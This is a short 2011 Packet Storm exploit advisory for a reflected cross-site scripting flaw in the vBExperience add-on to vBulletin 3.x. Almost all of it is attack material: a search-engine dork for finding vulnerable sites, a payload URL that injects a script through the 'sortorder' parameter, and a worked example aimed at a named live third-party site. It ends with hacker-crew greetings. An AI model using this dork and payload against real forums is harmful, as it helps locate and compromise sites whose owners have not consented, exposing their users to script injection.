vBulletin 3.x vBExperience Cross Site Scripting

2011-06-04T00:00:00
ID PACKETSTORM:102001
Type packetstorm
Reporter Mr.ThieF
Modified 2011-06-04T00:00:00

Description

                                        
                                            `  
[~] Author : Mr.ThieF <~  
  
[~] Contact : Mr.ThieF@yahoo.com <~  
  
[~] DorK : inurl:xperience.php  
  
[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=171014  
  
[~] Version : 3.x.x  
  
[~] Exploit :  
  
http://[site]/[path]/xperience.php?sortfield=xr&sortorder="><s cript>alert(1);</s cript>  
  
Example : http://www.worldwide-invest.org/xperience.php?sortfield=xr&sortorder="><s cript>alert(1);</s cript>  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
GreeTz : RENO <3 - x-CoD3r <3 - T3rr0risT_07 <3 -Snip3r_www - ALL My FrindS <3   
`